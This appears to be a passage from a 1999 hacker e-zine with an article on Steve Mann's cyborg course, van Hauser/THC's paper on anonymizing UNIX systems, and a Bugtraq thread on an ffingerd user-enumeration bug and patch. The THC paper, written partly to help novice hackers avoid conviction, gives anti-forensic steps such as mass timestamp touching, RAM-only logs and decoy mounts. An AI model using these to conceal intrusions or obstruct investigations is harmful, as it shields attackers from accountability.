list Wear-Hard@haven.org. http://wearables.blu.org/ Sidebar: 20.1 School for Cyborgs ~~~~~~~~~~~~~~~~~~ Engineering students cross the human/machine gap — or do they? By Steve Ditlea The black sunglasses perched on Steve Mann’s forehead provide a rare tinge of high-tech glamour in a drab classroom in the University of Toronto’s Department of Electrical & Computer Engineering. Wearing a ribbed red-and-gray sweater, Mann appears, to a casual observer, quite normal. And the class he teaches—“ECE 1766: Personal Imaging and Photoquantigraphic Image Processing—seems ordinary. You’d never know the 20 students were recruited via a campus flyer bearing the headline: YOU WILL BE ASSIMILATED. BECOME THE WORLD’S FIRST “CYBORGS. For anyone weaned on TV’s latter-day Star Trek series and their vision of half-computer/half-humans losing their individuality to the collective consciousness known as the Borg, the notion of being absorbed into a computer-mediated entity terrifies and fascinates. As the pioneering class on becoming a cyborg, this one-semester offering for graduate students and fourth-year undergrads has attracted a smattering of casually dressed men and one woman. The polyglot group includes students from Germany and Iran, as well as Canadians with family ties to Asia and the Middle East. It is, in fact, the embodiment of Star Trek’s multiethnic ethos. Wearable PCs, brick-sized, with awkward monocular head-mounted displays, rest on the desks of just two students—the only overt sign that this may be a milestone of human-computer interaction. The wearable computers—commercially available systems on loan from manufacturer Xybernaut—are curiosities on a campus more familiar with notebook and palm computers. As students concentrate on their teacher’s words, no wearables are actually in use. Or so it seems. But look more closely at Mann and you see more than a dozen bulges straining the fabric of his striped sweater, like some Alien-movie spawn about to burst from his body. He trails a gray cable, an old-fashioned plastic rocker switch, some black, red and gray wires, and a miniature keyboard—items that just miss getting caught on the edge of his desk as he paces on and off the dais. Under his sweater Mann wears a lightweight wearable computer of his own design, wirelessly linked to the Internet and to his documents, which he can access in a screen hidden behind his glasses. In his computer-ready state, Mann is the only cyborg in the room—the master imparting esoteric knowledge to a new generation, knowledge that will allow them to become cyborgs, too. For a few hours the previous week everyone in the class wore Xybernaut computers as they participated in what Mann calls their “first project as a community of cyborgs. Linked by a few cell phones, this pod of borgs toured the campus, capturing images using Mann’s “lightspace photographic technique. Next week, for the course’s “open eye final exam, students are to wear Xybernauts “as an aid for calculations, as a memory prosthesis, etc., according to the paper he hands out. Mann adds: “This may well be the world’s first exam involving the testing of a class of cyborg entities—humans and computers, inextricably intertwined. Grand thoughts, but here in the classroom, the cyborg vision has run into hard-edged reality. The Xybernaut systems, designed originally for defense and industrial applications, aren’t really all that wearable—at least, not comfortably for more than minutes at a time. “It’s bulky, it’s heavy, says fourth-year undergrad Greg Harmandayan. Classmate Daniel Friedmann concurs: “What you wear on your waist and this head-mounted display isn’t what I thought of as being completely wearable. Special student Stephen Ross, on a break from his full-time job, complains that “the equipment’s battery life is too short to allow us to go online for any extended amount of time. Not only does the hardware fall short—there are some human deficits as well. In winnowing down 40 applicants for the class, Mann insisted on knowledge of computing fundamentals. He later explains: “I said right up front that to succeed at this class, people better not be afraid of mathematics or of operating systems, getting down and dirty with the kernel. Unfortunately, the students who take the class are accustomed to Windows-based computer systems, and have required several weeks to acclimate themselves to the do-it-yourself tweaking of Linux, Mann’s operating system of choice for his and his students’ wearables. (A Xybernaut PC runs uncomfortably hot with Windows, remaining considerably cooler with Linux’s more efficient code.) But the delay in Linux literacy slows Mann down, leaving him unable to cover as ambitious a syllabus as he would like during limited class hours. When Mann teaches the course this summer in an immersion-intensive form, he plans to avoid both problems. “I might say as a prerequisite that you’ve already got to be a cyborg with your own equipment. I would take 20 or 30 people from around the world who are already cyborgs. And when ECE 1766 starts again in the fall, Mann expects students to be issued Xybernaut’s next generation of wearables—faster, more compact systems manufactured through an arrangement with Sony. For Mann, though, the computing hardware is incidental to a wider vision of “humanistic intelligence—of computer-complemented humans in a multimedia world. “Wearable computing is meaningless in and of itself, he says. As he sees it, the personal computing applications of wearables stressed by commercial manufacturers such as Xybernaut are a mere subset of the visual recording, interpretation and augmentation functions of his own systems. Having spent much of his life achieving oneness with his machine, Mann sometimes seems to forget how remarkable his accomplishment is. “How to be a cyborg is a totally boring concept, he insists. “The fundamental mathematical basis behind it makes it interesting. Otherwise, it’s not much of a course. Despite the doubts about their comfort and practicality, 16 of the 20 Xybernaut computers signed out by ECE 1766 students remain at large following completion of the course. Several students are exploring the possibility of graduate study with Mann. Almost all have been marked for life. They have been assimilated. Steve Ditlea is a contributing writer for Technology Review. @HWA 21.0 Anonymizing UNIX systems white paper by van Hauser/THC ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ---[ Anonymizing UNIX Systems ]--- version 0.7 Author: van Hauser / THC I. THE AUDIENCE II. GOAL III. PREREQUISITES IV. USER DATA 1. Sensitive user data 2. Protecting /home directories 3. Traceable user activity 4. Protecting /var/spool/mail/user files V. SYSTEM DATA 1. Sensitive system data 2. Traceable system activity 3. Logging - important and dangerous 4. Protecting system configs 5. Computer Memory and sensitive /proc interfaces VI. DELETE(D) DATA AND SWAP 1. How to delete files in a secure way 2. How to wipe free disk space 3. How to handle swap data 4. How to handle RAM 5. Temporary data - it is evil VII. NETWORK CONNECTIONS VIII. HIDING PRIVACY SETTINGS 1. Mount is your friend 2. Removable Medias 3. ??? IX. EXAMPLE CONFIGURATION AND SCRIPTS X. FINAL COMMENTS 1. Where to get the tools mentioned in this text 2. Additional thoughts 3. Greetings (what would the world be without greets?) 4. How to contact me for updates or comments -------------------- * I. THE AUDIENCE This text is for any human being out there who wishes to keep their data and doings private from any snooping eye - monitoring network traffic and stealing/accessing the computer including electronic forensics. Hackers, phreakers, criminals, members of democracy parties in totalitarian states, human rights workers, and people with high profiles might be interested in this information. It was especially written for novice hackers so they are not so easily convicted when busted for their early curiosity. Thanks to Solar Designer, Fyodor, typo, tick, pragmatic, mixter and doc holiday for comments, critics and ideas. Special thanks to rookie who had the original idea writing this paper but through personal problems couldn't do it himself. * II. GOAL Our goal is to provide solutions to the following statements: (1) The solution should be simple and easy (2) All user data should be inaccessible by anyone except their owner (3) Nobody should be able to reconstruct what is happening on the system Maybe you see contradictions ;-) * III. PREREQUISITES It is important to state the prerequisites for this project: - The system should be secure. No remote vulnerabilities (and hopefully no local ones either) - The system administator(s) must be trusted and willing to set this up - The operating system to achieve this is a UNIX Note that the solutions presented do not 100% fit internet servers. However it's (nearly, bah ;-) perfect for enduser systems. For the UNIX part, we show the solutions for Linux because it is the unix most easily for beginners to get their hands on and administrate. The Linux distribution we use is the SuSE Linux Distribution 6.0 Debian is better but more complicated for beginners. And I dislike redhat for it's missing security. You should know enough about unix (what is portmap, mount, rc2.d etc.) before trying to understand this text. It's *not* a Linux-Howto! * IV. USER DATA *** 1. Sensitive user data What is sensitive user data? Well *any* data from a user account. This includes: - utmp/wtmp/lastlog data (login times and duration plus login hosts) - history files (what commands you typed in your session) - your emails - temporary files from applications like mailers, browsers etc. - applications and their configuration - your own data (documents, porn pics, confidental data) - time stamps on your data (when were you accessing/editing which data) - on multiuser systems: what users CURRENTLY are doing.. this includes process listing, and network connections as well as utmp (which is already covered by another category). -> make proc more restrictive. We are trying to protect all this data. Note that utmp/wtmp/lastlog data and mail (mqueue/mail/fax/lpd) is handled in the SYSTEM DATA section. Note that all user accounts can be seen from /etc/passwd ;-) So maybe you'd like to add some/many fake accounts, together with homedirs and crypted data ... *** 2. Protecting /home directories Most important for protecting user data is protecting the users' /home directories. Each home directory must be encrypted with a strong cypher so that even with full physical access to the system the data can't be obtained. Currently I know of only one software provididing a solution to our requirements: CFS - the cryptographic filesystem. There are also some other crypto solutions available : TCFS, SFS and the loop filesystem with crypt support. They are faster but have got the disadvantage that you'll have to recompile your kernel with patches from these tools. So for the sake of easeness, I stick with CFS here. (Pointers to all tools mentioned in this text can be found at the end) To enable CFS we must put these six lines in a rc2.d script: portmap rpc.mountd -P 894 # mountd should bind to port 894 cfsd 895 # cfsd should bind to port 895 rm -rf /tmp/.tmp mkdir -p -m 700 /tmp/.tmp mount -o port=895,intr localhost:/tmp/.tmp /home Additionaly we have to put this entry into /etc/exports: /tmp/.tmp localhost Okay. This starts the sunrpc with the mountdaemon which are necessary for CFS to be started and used. Now we need to get the following going: if a user logs on, the system has to check if he's already logged in to decide whether to decrypt the users' home directory. This sounds hard but is easy: the user's /home/user directory doesn't exist (even if it would, because of mount command nine lines above would make it nonexistent), so the user's HOME variable is set to '/' the root directory. Then his login shell is started which looks for it's start scripts. And that's were we put our hooks in. We create (this example is for bash) the file /.profile with the following contents: cattach /crypt/$USER $USER || exit 0 export HOME=/home/$USER cd $HOME if test -f $HOME/.profile; then . $HOME/.profile fi When a user logs on the first time, this script will be executed. The user has to enter the password for his crypted homedir, and after this his correct HOME variable is set and the normal login profile is read and done. If a user doesn't know the passphrase for his crypted homedir, he is logged out. But how do we remove the decrypted homedir after the user logs out? This script should be clever, because a user could be logged in several times at once, and it should only be removed when the last loginshell exits. Thank god, this is easy too, we create a /home/user/.bash_logout script: # if the number of user's login shells are > 3 then this is the last. shells=`ps xu | grep -- "$USER .* S .* -[^ ]*sh" | wc -l` test $shells -lt 3 || exit 0 export HOME=/ cd / cdetach $USER Thats all. From now on, the users' homedirectories are safe. Note that a user can't login now, start a background job which writes data in his homedirectory and log out because his homedirectory would be removed. The full .bash_logout script I provide in (see two lines below) checks for a $HOME/.keep file and if present doesn't remove the homedir. For network logins you should keep in mind that they should not be done via rlogin, telnet, etc. because they send all traffic (including passwords) in plaintext over the network. You should use a tool which encrypts the whole traffic like SSLtelnet or SSH (for SSH you need to set "UseLogin yes" in the /etc/sshd_config file). You'll find all these scripts with error checking, user creating, stop scripts and config files etc. in section IX. EXAMPLE CONFIGURATION Note that we started daemons in the section which can be contacted from remote. If you don't want this (because there are no external users who need to mount their crypted user data on their own machine) you should firewall these ports. Look in you manpages ("man ipchains" or "man ipfwadm"). *** 3. Traceable user activity [Warning, this section shows first how to perform simple electronic forensics] It is easy to see who logged on the system and what he did by the timestamps. Even if all your data is crypted, by checking the last access time (atime) of your files, someone may check when you logged in last time, for what duration and if you were idleing or doing much stuff. If the systems doesn't have many users, someone might even tell what you did. Example: The earliest access time for a crypted file in your homedir can be seen by: ls -altur /crypt/$USER | head -1 # shows the logout file ls -altu /crypt/$USER | more # with some brain you'll find # the login time then you also have the duration of the session. By checking the change/modification and access time of those crypted files with their timestamps someone can see how hard you were working, and get more conclusions (e.g. if many files nested in a three levels deep directory where modified this is probably a browser - so you were surfing the net). This insight will now make it possible to check what commands were run: Let's say the login time as 22 hours ago, so you run: find / -type f -atime 0 -ls # shows the accessed files find / -type f -mtime 0 -ls # shows the modified files (this can be done with directories too) Now check the output for the correct timeframe and analyze what you found. e.g. the telnet client was accessed. So it's probable, the user used it to connect to another system. I think you can imagine now what is possible. To protect against this is also very easy: Create the file /usr/local/bin/touch_them and make it executable with the following contents: find /crypt /tmp /etc /var/spool 2> /dev/null | xargs -n 250 touch Then put the following line into /etc/crontab: 50 * * * * root /usr/local/bin/touch_them finally you change the 4th row of all lines in /etc/fstab which have the keyword "ext2" in their third (the filesystem type) row: defaults (or anything else) should become defaults,noatime (the old value is kept, and noatime is appended) example: /dev/hda1 / ext2 defaults 1 1 becomes /dev/hda1 / ext2 defaults,noatime 1 1 What did we achieve? The crontab entry with the small script updates the atime, mtime and ctime to the current time every hour of special directories - especially those which may hold user data. The mount options we changed now prevent the update of the atime. However, this needs a current 2.2.x kernel - it isn't implemented on the 2.0 kernel tree! *** 4. Protecting /var/spool/* files /var/spool/mail : Now it gets tricky. How can we protect the new mail for a user from spying eyes? It can't be sent directly to a user's homedir like qmail would do because it's crypted. The easiest solution is to use pgp to encrypt your outgoing emails and tell all your friends that they should also encrypt all emails to you. However, this is not satisfying. An attacker can still see who sent the user the email. The only possibility to hide this is using anonymous remailer. This is not a great solution, so this is an open point (see section X.2: Additional thoughts) /var/spool/{mqueue|fax|lpd} : Well, all you can do is try to flush the queues when shutting down. After that you have to decide if you delete the remaining files in a secure way or leave it where it is. Or program a special script which does something with the data (like taring the data and encrypting it with pgp, doing the reverse when the system is rebooted) You can also create a whole crypted /var partition, but that would require someone at the console while booting the system - every time. * V. SYSTEM DATA *** 1. Sensitive system data What is sensitive system data? *Anything* which gives conclusion on incoming and outgoing data, configuration files, logs, reboots and shutdowns. This includes: - utmp/wtmp/lastlog data (boot, reboot, shutdown times + user times) - ppp dialup script - sendmail and tcp wrapper configurations - proxy cache data (e.g. squid web/ftp proxy) - syslog messages - /var/spool/* data {mqueue|fax|lpd|mail} - temporary files from daemons - time stamps on data (when were what data accessed/edited) How to prevent time stamp forensica, see section IV.3 How to protect /var/spool/* data, see section IV.4 for an incomplete solution. *** 2. Traceable system activity (prevent of time stamp forensic is handled in section IV.3) To trace system activity, you can easily check temporary files of daemons and applications. Some of them write to /tmp, root applications usually (should) write to /var/run. We handle this together with section V.3: Logging. All you have to do is this, and only *once* : cd /var mv run log ln -s log/run run this moves the /var/run directory to /var/log/run and sets a symlink in it's former place so that applications still find their files. *** 3. Logging - important and dangerous Logging is important to trace problems like misconfigurations. Logging is dangerous because an attacker can see important data in the logfiles, like the user's login and logout time, if they executed "su" or other commands etc. We try to find a balance between this. Our solution: Write all log data to one special directory. This directory is a RAM disk so the data is lost after a system shutdown. Ensure that syslogd [/etc/syslog.conf] and daemons (e.g. httpd [apache]) only write to our special logging directory or a system console. /var/log should be used as our special logging directory. Now we put the following commands into /sbin/init.d/boot.local: umask 027 mke2fs -m0 /dev/ram0 1> /dev/null 2>&1 rm -rf /var/log/* 2> /dev/null mount -t ext2 /dev/ram0 /var/log chmod 751 /var/log cd /var/log mkdir -m 775 run chgrp uucp run for i in `grep /var/log /etc/syslog.conf|grep -v '^#'| \ awk '{print $2}'|sed 's/^-//'` do > $i ; done umask 007 # 002 might be used too. for i in run/utmp wtmp lastlog do > $i ; chgrp tty $i ; done cd / kill -HUP `pidof syslogd` 2> /dev/null After your next reboot it behaves like described above. Some of you will not like the idea of having no logs after a reboot. This way you can't trace an intruder or guess from your logs what crashed the machine. Either you can tar the files and pgp before the shutdown is complete (but the data would be lost if a crash occurs), or you might also use ssyslog or syslog-ng, special syslogs with crypting capabilities, and write the data you really want to keep to (just an example) /var/slog. You can also create a whole crypted /var partition, but that would require someone at the console while booting the system - every time. *** 4. Protecting system configs This is tricky. It is easy to achieve but for a price. If we create an account with uid which has his homedir in /home and is hence protected by our CFS configuration, you need to be at the console at every reboot. This isn't practical for server systems that need to be administrated and rebooted remotely. This solution is only good for end-user pcs. Just create an account with the uid 0 (e.g. with the login name "admin"). You can use the create_user script from section IX. Put all your sensitive configuration files you want to protect into this directory (ppp dialup scripts, sendmail.cf configs, squid configs with their cache directory set to a subdir of "admin" etc.) Now create a small shellscript which starts these daemons with a command line option to use the config files in your "admin" homedir. Your system is then secure from extracting the sensitive information from the config files. But for a price. You have to log in after each reboot as user "admin", enter your CFS passphrase and start the script. *** 5. Computer Memory and sensitive /proc interfaces For a real multiuser system on which the administrator want additionally ensure the privacy of the user online, he has to hide the user process information, a user would normally see when issuing a "who" or "ps" command. To protect the user's process information, you can use Solar Designer's secure-linux kernel patch. To protect the utmp/wtmp/lastlog we ensure that these files are only readable by root and group tty, hence a normal user can't access this data. (This is done in the boot.local example script) Now one problem is left. Even with normal RAM a well funded organisation can get the contents after the system is powered off. With the modern SDRAM it's even worse, where the data stays on the RAM permanently until new data is written. For this, I introduced a small tool for the secure_delete package 2.1, called "smem" which tries to clean the memory. This one should be called on shutdown. It is done in the example in section VI.4 * VI. DELETE(D) DATA AND SWAP *** 1. How to delete files in a secure way< When a file is deleted, only the inode data is freed, the contents of the data is NOT wiped and can be gathered with tools like "dd" or the tool manpipulate_data from THC. Peter Gutmann wrote a paper with the name "Secure Deletion of Data from Magnetic and Solid-State Memory" presented 1996 at the 6th Usenix Security Symposium. This is the best civilian paper on how to wipe data in a way that it is hard for even electronic microscopes to regain the data. There are four tools out there which uses the techniques described there, two called "wipe", one called "srm" from THC's secure_delete package and "shred" which is part of the new fileutil package from GNU. Ours is still the best from it's design, features and security, and it has also all important and advanced commandline options and speed you need. To use one of these tools for deletion just set an alias in /etc/profile: alias rm=srm # or wipe or shred or even better, move /bin/rm to /bin/rm.orig and copy the secure delete program to /bin/rm. This ensures, that all data which is deleted via rm is securely wiped. If you can't install THC's secure_delete package or any other (for any reason) you can also set the wipe flag from the ext2 filesystem on files you wish to wipe before rm'ing them. It's nearly the same, but it's NOT a secure wipe like mentioned above. It's set by: chattr +s filename(s) [Note that it is *still* possible for a well funded organisation to get your data. Don't rely on this! See section VI.4 !] *** 2. How to wipe free disk space Most times applications like the editor in your mail program write a temporary file. And you don't know about it - you weren't even asked :( Because they don't wipe the data in a secure way, an attacker can get all your private emails just because you didn't know. That's bad. The solution: You use a wiper program which cleans all unused data from the disk partitions. The only one available is the one from THC's secure_delete package. You could put "sfill" (that is what it is called) in you crontab so it is run regulary but this might create problems when at this moment this space is needed by an important application. At least when the system shuts down, sfill should be called. Put this in the "stop" part of a late rc2.d script: sfill -llf /tmp 2> /dev/null sfill -llf /var/spool 2> /dev/null Note that it is a good idea to generate a new paritition for /tmp itself, and putting a symlink from /usr/tmp and /var/tmp to /tmp. This way it is easier to control and wipe. Again, if you can't install the secure_delete package for any reason, you can also use this solution (slower and not as secure): dd if=/dev/zero of=/tmp/cleanup sync rm /tmp/cleanup *** 3. How to handle swap data Securely wiping files and free diskspace - well what's left? Today, harddisk MB's are cheaper than RAM, thats why swap space is used to expand the available RAM. This is in reality a file or partition on your harddisk. And can have your sensitive data in it. Again there is only one tool which helps you out here, "sswap" from THC's secure_delete package ;-) Put this line after the "swapoff" line in /sbin/init.d/halt: sswap -l /dev/XXXX # the device for your swap, check /etc/fstab *** 4. How to handle RAM In section V.5 I wrote about sensitive information in your RAM, the fast memory of your computer system. It can hold very sensitive information like the email you wrote before pgp'ing it, passwords, anything. To ensure, that the memory is cleaned, use the smem utility. It should be called like this in the stop part of a late rc2.d script (as already mentioned above), after the wiping the file of /tmp etc. and then wiping the free memory: smem -ll *** 5. Temporary data - it is evil After you have secured/anonymized/privatized your system so far everything's ready - or did you forget something? Remember what we told you in section VI.1, that temporary data is written somewhere and sometimes you don't know. If you are unlucky, all we've done here was useless. We have to ensure that there's no temporary data left on the devices and that it can't be recovered either. We already dealed with /var/log, /var/run and sent email (/var/spool/...), and we wipe all free diskspace from our temporary disk locations. Now we must wipe also the temporary data. Put this line in the stop part of a late rc2.d script (before sfill from VI.3): ( cd /tmp ; ls -A | xargs -n 250 srm -r ; ) Also a $USER/tmp directory should be created for all users under the CFS /home protection and a TMPDIR variable set to this directory. See section IX. for all these scripts ... * VII. NETWORK CONNECTIONS This is a very specialized area of this document. I write here a few ways how someone can protect some of their data being transfered on the internet. The basic prerequisites are as following: You've got an external POP3 and SMTP (mail relayer) where you get and send your email. When your go on irc, you also don't like your real hostname being printed on the channels. Your external mail server should be in another country, because if maybe some official agencies think you're doing something illegal (and I'm sure you won't) it's harder to get a search warrant. It's also harder because companies or individuals that try to get your data would need to invest more time, work and money to get it. You can tunnel your SMTP and POP3 via ssh to the external mail server. For POP3 this is easy, but for SMTP this is a bit harder. Just as an example, irc traffic can be tunneled through this as well, but dcc stuff won't work (one way doesn't work, the other would reveal your ip address to the sender and the data is not encrypted on any part of the internet) Note that you can also use redirectors and proxies to accomplish further redirecting for other protocols (www, irc, ftp proxies etc.) Thats all. All mail traffic (and as you can see below, irc traffic too) is being crypted between you and your mail/proxy server. sendmail.cf (important parts): DSsmtp:[127.0.0.1] DjTHE_DOMAIN_NAME_OF_YOUR_EMAIL DMTHE_DOMAIN_NAME_OF_YOUR_EMAIL - Msmtp, P=[IPC], F=mDFMuX, S=11/31, R=21, E=\r\n, L=990, + Msmtp, P=[IPC], F=mDFMuXk, S=11/31, R=21, E=\r\n, L=990, (add the "k" switch to the smtp option config line) ~user/.fetchmailrc: poll localhost protocol POP3: user USER_REMOTE with pass PASSWORD_REMOTE is USER_LOCAL here mda "/usr/sbin/sendmail -oem USER_LOCAL" (enter the corresponding USER_* and PASSWORD in here) The ssh commandline which tunnels the traffic for POP3, SMTP and irc: ssh -a -f -x -L 110:localhost:110 -L 6667:irc.server.com:6667 -L \ 25:localhost:25 your_mail_server.com That's all. I won't tell you more. Use your brain ;-) * VIII. HIDING PRIVACY SETTINGS *** 1. Mount is your friend Take a look at the following commands: # ls -l /home total 3 drwxr-x--- 1 root root 1024 Mar 28 14:53 admin drwxr-x--- 1 vh thc 1024 Mar 28 16:22 vh drwxr-x--- 1 user users 1024 Mar 28 11:22 user # mount -t ext2 /dev/hda11 /home # or a ramdisk, doesn't matter # ls -l /home total 0 # : whoops, where are the homedirs ? # umount /home # ls -al /home total 3 drwxr-x--- 1 root root 1024 Mar 28 14:53 admin drwxr-x--- 1 vh thc 1024 Mar 28 16:22 vh drwxr-x--- 1 user users 1024 Mar 28 11:22 user # : ah, yeah there they are again ... This is a nice feature to hide your crypted data and binaries. Just put your files into e.g. /usr/local/bin and /usr/local/crypt and mount a decoy filesystem over /usr/local. If you then have got a process started in your boot scripts which opens a file on the decoy filesystem, the filesystem can't be unmounted until the process is killed. This way, it's much harder for someone to detect your data! *** 2. Removable Medias An even better possibility is: put all your sensitive data on a removable media. Put your media in, mount it, it run the startscript from it to activate all the privacy stuff. This way you made it one step harder for someone to get to know whats going on. *** 3. ??? Any other ideas? Think about it! (and maybe send me your ideas ;-) * IX. EXAMPLE CONFIGURATION AND SCRIPTS Click here to download the anonymous-unix-0.7.tar.gz tools! * X. FINAL COMMENTS *** 1. Where to get the tools mentioned in this text - Crypto Filesystems CFS (Cryptographic File System) http://www.replay.com TCFS (Transparent CFS) ftp://mikonos.dia.unisa.it/pub/tcfs/ SFS (Stegano File System) http://www.linux-security.org/sfs Crypto Loopback Filesystem ftp://ftp.csua.berkeley.edu/pub/cypherpunks/filesystems/linux/ - Tools THC's secure_delete package http://www.infowar.co.uk/thc secure-linux kernel patch http://www.false.com/security syslog-ng http://www.balabit.hu/products/syslog-ng.htm ssylog http://www.core-sdi.com/ssyslog - The example Linux Distribution SuSE Linux Distribution http://www.suse.com *** 2. Additional thoughts The following problems are still present: - If an attacker can gain access to the system without rebooting and in time before data is wiped, unmounted, etc. these countermeasures are worthless. - If a really well funded organisation is trying to decrypt your data via brute force/dictionary or good electronic microscopes and technical staff with excellent knowhow, your wiping won't help you very much. - The solution for /var/spool/mail and /var/spool/mqueue etc. is far away from being perfect. Remember this. Ideas welcome. - The configuration of your system daemons can only be secured if you are present at the console after a reboot. That's the price. - It is not very hard to detect the privacy stuff done. This might bring you in trouble in countries like China or Iran. Removable medias might help, or try a crypto filesystem with stegano support. Secure your system against unauthorized (from your point of view) access and use strong passwords. *** 3. Greetings (what would the world be without greets?) What would the world be without love and greetings? ;-) Greets to individuals (in alphabetic order): Doc Holiday, Froody, Fyodor, plasmoid, pragmatic, rookie, Solar Designer, Tick, Wilkins. Greets to groups: ADM, THC (of course ;-) and arF Greets to channel members: #bluebox, #hack, #hax, #!adm and #ccc *** 4. How to contact me for updates or comments Please send me any further ideas you've got to make this documentation better! Did I wrote bad bad english in some part? Could I rephrase parts to make it easier to understand? What is wrong? What's missing? van Hauser / THC - [The Hacker's Choice] THC's Webpage -> http://r3wt.base.org (or http://thc.pimmel.com or http://www.infowar.co.uk/thc) Type Bits/KeyID Date User ID pub 2048/CDD6A571 1998/04/27 van Hauser / THC -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3i mQENAzVE0A4AAAEIAOzKPhKBDFDyeTvMKQ1xx6781tEdIYgrkrsUEL6VoJ8H8CIU SeXDuCVu3JlMKITD6nPMFJ/DT0iKHgnHUZGdCQEk/b1YHUYOcig1DPGsg3WeTX7L XL1M4DwqDvPz5QUQ+U+VHuNOUzgxfcjhHsjJj2qorVZ/T5x4k3U960CMJ11eOVNC meD/+c6a2FfLZJG0sJ/kIZ9HUkY/dvXDInOJaalQc1mYjkvfcPsSzas4ddiXiDyc QcKX+HAXIdmT7bjq5+JS6yspnBvIZC55tB7ci2axTjwpkdzJBZIkCoBlWsDXNwyq s70Lo3H9dcaNt4ubz5OMVIvJHFMCEtIGS83WpXEABRG0J3ZhbiBIYXVzZXIgLyBU SEMgPHZoQHJlcHRpbGUucnVnLmFjLmJlPokAlQMFEDVE0D7Kb9wCOxiMfQEBvpAD /3UCDgJs1CNg/zpLhRuUBlYsZ1kimb9cbB/ufL1I4lYM5WMyw+YfGN0p02oY4pVn CQN6ca5OsqeXHWfn7LxBT3lXEPCckd+vb9LPPCzuDPS/zYnOkUXgUQdPo69B04dl C9C1YXcZjplYso2q3NYnuc0lu7WVD0qT52snNUDkd19ciQEVAwUQNUTQDhLSBkvN 1qVxAQGRTwgA05OmurXHVByFcvDaBRMhX6pKbTiVKh8HdJa8IdvuqHOcYFZ2L+xZ PAQy2WCqeakvss9Xn9I28/PQZ+6TmqWUmG0qgxe5MwkaXWxszKwRsQ8hH+bcppsZ 2/Q3BxSfPege4PPwFWsajnymsnmhdVvvrt69grzJDm+iMK0WR33+RvtgjUj+i22X lpt5hLHufDatQzukMu4R84M1tbGnUCNF0wICrU4U503yCA4DT/1eMoDXI0BQXmM/ Ygk9bO2Icy+lw1WPodrWmg4TJhdIgxuYlNLIu6TyqDYxjA/c525cBbdqwoE+YvUI o7CN/bJN0bKg1Y/BMTHEK3mpRLLWxVMRYw== =MdzX -----END PGP PUBLIC KEY BLOCK----- @HWA 22.0 Ffingerd vulnerability ~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 23 Apr 1999 19:26:13 +0300 From: Eilon Gishri To: BUGTRAQ@netspace.org Subject: Ffingerd privacy issues Hi, I found a couple of bugs in ffingerd 1.19 which are related to privacy. Here goes: The permission on root's home directory are now 700 (/home/root). ----- (aristo)/cc/eilon>finger root@host.domain [host.domain] Login: root Name: #6 No project. No plan. No public key. ----- A lesson in how not to be seen. On host.domain, the user doesn't want to be seen (please stand up :)). Too bad, his/her home directory's permissions (which says 'I want some privacy') makes ffingerd state otherwise. Ffingerd looks for the file .nofinger in the user's home directory but due to the current state of permissions on it, it can't be accessed thus "there is no such file" and there for is happy to supply us with the user's information. ----- # cd ~root # ls -l .nofinger -rw-r--r-- 1 root system 0 Apr 23 18:01 .nofinger # ls -ld . drwx------ 5 root system 512 Apr 23 18:01 . # chmod 755 . ----- Now lets try again. ----- (aristo)/cc/eilon>finger root@host.domain [host.domain] That user does not want to be fingered ----- Hmmm, now for an unknown user. ----- (aristo)/cc/eilon>finger root1@host.domain [host.domain] That user does not want to be fingered. ----- Oops. Notice the dot ('.') at the end of the sentence. A very simple and efficient way to find whether the user exists on the remote host or not (taking into account the fact that ffingerd has been installed on the remote host). Attached here a patch to fix those problems. -- Eilon Gishri eilon@aristo.tau.ac.il Security Consultant Office: +972-3-6406723 Israel Inter University Computation Center Fax: +972-3-6409118 /* On a matter of national security */ Home: +972-3-5078671 [ Part 1.2, Text/PLAIN 20 lines. ] --- ffingerd.c.old Thu Feb 18 12:50:36 1999 +++ ffingerd.c Fri Apr 23 18:48:54 1999 @@ -134,7 +134,7 @@ setgid(pwd->pw_gid); setuid(pwd->pw_uid); sprintf(filename,"%.200s/.nofinger",pwd->pw_dir); - if (lstat(filename,&stat_buf)) { + if((lstat(filename,&stat_buf) == -1) && (errno == ENOENT)) { #ifndef NO_SYSLOG #ifdef FASCIST_LOGGING char message[512]; @@ -154,7 +154,7 @@ dump_file(filename,"Public key:","No public key."); } else { char message[512]; - puts("That user does not want to be fingered"); + puts("That user does not want to be fingered."); #ifndef NO_SYSLOG sprintf(message,"attempt to finger \"%.200s\" from %.200s\n",pwd->pw_name,remote); syslog(LOG_FACILITY,"%s",message); ------------------------------------------------------------------------------ Date: Fri, 23 Apr 1999 19:43:33 +0200 From: Felix von Leitner To: BUGTRAQ@netspace.org Subject: Re: Ffingerd privacy issues Thus spake Eilon Gishri (eilon@aristo.tau.ac.il): > I found a couple of bugs in ffingerd 1.19 which are related to > privacy. OK. I would be happy if you email me (the author) first before publishing this on bugtraq. Next time, maybe. [ffingerd assumes the user wants to be fingered if his home does not give public execute access] This is documented in ffingerd. If you want ffingerd to look into protected homes, run it as root. > ----- > (aristo)/cc/eilon>finger root@host.domain > [host.domain] > That user does not want to be fingered > ----- > Hmmm, now for an unknown user. > ----- > (aristo)/cc/eilon>finger root1@host.domain > [host.domain] > That user does not want to be fingered. > ----- > Oops. Notice the dot ('.') at the end of the sentence. A very simple > and efficient way to find whether the user exists on the remote host > or not (taking into account the fact that ffingerd has been installed > on the remote host). This has been pointed out to me yesterday. I fixed it today (before I saw this message, by the way), and announced version 1.20 on Freshmeat pointing out this fixed problem. Did you see my announcement and then posted to bugtraq? > --- ffingerd.c.old Thu Feb 18 12:50:36 1999 > +++ ffingerd.c Fri Apr 23 18:48:54 1999 > @@ -134,7 +134,7 @@ > setgid(pwd->pw_gid); > setuid(pwd->pw_uid); > sprintf(filename,"%.200s/.nofinger",pwd->pw_dir); > - if (lstat(filename,&stat_buf)) { > + if((lstat(filename,&stat_buf) == -1) && (errno == ENOENT)) { > #ifndef NO_SYSLOG > #ifdef FASCIST_LOGGING > char message[512]; This is debatable. If a user wants privacy, he should remove the world readable permission, not the world executable permission. I will not add this right now but think it over. If anyone wants to comment on the way to go here, feel free to email me. I would prefer discussion this in private email than on bugtraq, but if you must, I will also read bugtraq comments. > @@ -154,7 +154,7 @@ > dump_file(filename,"Public key:","No public key."); > } else { > char message[512]; > - puts("That user does not want to be fingered"); > + puts("That user does not want to be fingered."); > #ifndef NO_SYSLOG > sprintf(message,"attempt to finger \"%.200s\" from %.200s\n",pwd->pw_name,remote); > syslog(LOG_FACILITY,"%s",message); This has already been fixed. Felix ------------------------------------------------------------------------------ Date: Fri, 23 Apr 1999 22:00:08 +0300 From: 